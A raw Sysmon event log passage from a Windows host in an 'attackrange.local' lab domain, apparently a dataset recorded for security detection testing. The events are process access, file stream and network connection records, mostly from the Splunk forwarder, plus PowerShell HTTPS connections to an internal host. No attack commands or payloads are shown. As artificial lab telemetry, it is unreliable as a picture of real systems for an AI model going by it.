15:04:17.255{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.255{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.255{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.255{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.255{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-73F1-613B-55B4-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.255{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73F1-613B-55B4-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.250{B81B27B7-73F1-613B-55B4-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:18.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=829A09695D8B34F5B1B51BF7D37203F2,SHA256=7812194490948AD96E566A10AB1320FD12B41D8D8903731DFE8A20BF61FD0C8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:18.301{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F782ACD96732B2019057C20DB44FA34,SHA256=5F694079BE44D8E4BB8273CC69AA89AA5D3F52AC3DD860597D1616754AA991F4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:18.301{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=163DBBD844B6B92945DA8715514A023A,SHA256=B5C0017E17B64558E7A6279F2C1A3DB215D2F8A573DE54E3802CC237169C8267,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:19.748{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D60BF4C540ED38AC3223BEAC7FC6181,SHA256=B6449395F00CEBD7B1AB2C34FE17F3565275788805C0F335442F2965F6561D77,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:20.783{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=980DA5CC785AB9E9B14D5CDBC822F0EB,SHA256=D71D413C3713998CBB697BEC7A6BEF383188F16DFA98E1318A5DFC757F97B105,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:20.351{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=73DD37BE15E602C505FF180B084F06EF,SHA256=E375D09CF33239B916827ED643EBAB0CE73645BB50ECF42ABB9F76C40F3EF0A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:21.797{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08F3D38E237270AE1CF065EC9BD98504,SHA256=7AFEE1B2ECE8EC3F21F5EE18E4707868FC4CECD34E9EA3FFC81A06EE24516262,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:22.846{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=150050DECEE179D7629275690A1EAB0F,SHA256=66690BC01489E28A4A31098AD3D26E6EEFF662106A3AE8F1345677483692AF5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:46.120{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52540-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:23.864{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=067D51849119EB2D2B35BFB9E474FF79,SHA256=423EB0B9D96BE269E03BAEC07FACE05BAD5CD971FCC15132435A8BA3DB8F9F44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:23.149{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:48.187{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52541-false10.0.1.12-8000- 23542300x800000000000000035343340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:24.878{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FEA2562C843AEF73583960A1188C5D7,SHA256=AEAB998C911E370FF59C7418E22E3156F156D84A32FAA3E99963219E6BB26C08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:24.364{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5F6C83DB7C8E5510EBA1A7A9956A084E,SHA256=1741E3108B2FEE618E647F4D355444E49D6D1592B2B615C13401177AA0EA23AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035343345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:25.969{B81B27B7-5BF5-611D-6D04-00000000C801}5004C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\AlternateServices.txt2021-06-03 19:19:29.415 23542300x800000000000000035343344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:25.969{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\AlternateServices.txtMD5=BAB5D78EADFA37FF61539088CAB0369C,SHA256=E17922A234E43985D6B910F9DB6DD261B2E590001C6470FBD9F617BF388412E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:25.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23720945EBAA9BC8FAA56780F96AA633,SHA256=B2FB78A6CD4E6A315C4968315571083B45BE3151873B99D081828445A0CA6833,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:50.132{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52543-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:50.131{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52542-false10.0.1.12-8089- 23542300x800000000000000035343346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:26.930{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25A5D73CFEB7328B0EB22080EAC84597,SHA256=0F0DA41A17322BA5131B91A8244C5901B3ADC58B059312AFDAD7E8520DD34062,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:27.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C78494C950F8EBF55581F1388C9301A4,SHA256=6B8EBE541A309835CACA85932E1EB0A92452FFD841514CF4F537795F2F3A024A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:28.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27C95BFC026EE61939457A4917972345,SHA256=D4261D9CBC08F74F64750F17F0D2510D60D5CF8C081307EFFB42BEA6D8778B84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:54.119{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52544-false10.0.1.12-8000- 354300x800000000000000035343352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:56.132{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52545-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:30.149{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4B40EB8D3C71E723A0F59CAEFAA20C9D,SHA256=9ECDC8CA66689B84EECA9784BB4B7077F004B2F0C791365462D5EB7B57FFAAE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:30.027{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DF7A11F2736D4A136D61D4EEC6A61EC,SHA256=8F7DFB74D3A54B4C9F7AB5F8B54B0FFD72F634F86B893B89FB16FDFDECB306D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.949{B81B27B7-73FF-613B-58B4-03000000C801}43724464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73FF-613B-58B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-73FF-613B-58B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.781{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73FF-613B-58B4-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 